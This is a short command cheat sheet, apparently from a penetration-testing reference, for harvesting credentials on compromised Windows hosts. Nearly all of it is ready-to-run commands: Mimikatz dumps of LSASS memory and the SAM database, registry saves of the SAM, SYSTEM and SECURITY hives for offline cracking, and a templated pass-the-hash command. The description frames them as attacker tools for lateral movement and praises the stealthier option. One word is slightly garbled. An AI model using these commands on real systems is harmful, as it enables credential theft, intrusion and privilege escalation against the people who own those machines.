🛠️ Command
Mimikatz: Dump LSASS Passwords
Extract cleartext passwords and NTLM hashes from the LSASS process memory.
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"Mimikatz: Dump SAM Database
Dump lpowershellocal account hashes from the Security Account Manager (SAM).
mimikatz.exe "privilege::debug" "lsadump::sam" "exit"
Registry: Save SAM and SYSTEM hives
Copy the registry hives to disk for offline cracking with secretsdump.
reg save HKLM\SAM sam.save; reg save HKLM\SYSTEM system.save; reg save HKLM\SECURITY security.saveMimikatz: Pass-the-Hash (PtH)
Create a new process as a different user using their NTLM hash.
mimikatz.exe "privilege::debug" "sekurlsa::pth /user:{{username}} /domain:{{domain}} /ntlm:{{ntlm_hash}}"📝 Description
Post-exploitation techniques for harvesting credentials from compromised Windows systems.
These tools allow an attacker to obtain the credentials needed for lateral movement and privilege escalation. Mimikatz is the premier tool for memory-based attacks, while the registry method is a stealthier alternative for offline analysis using tools like Impacket’s secretsdump.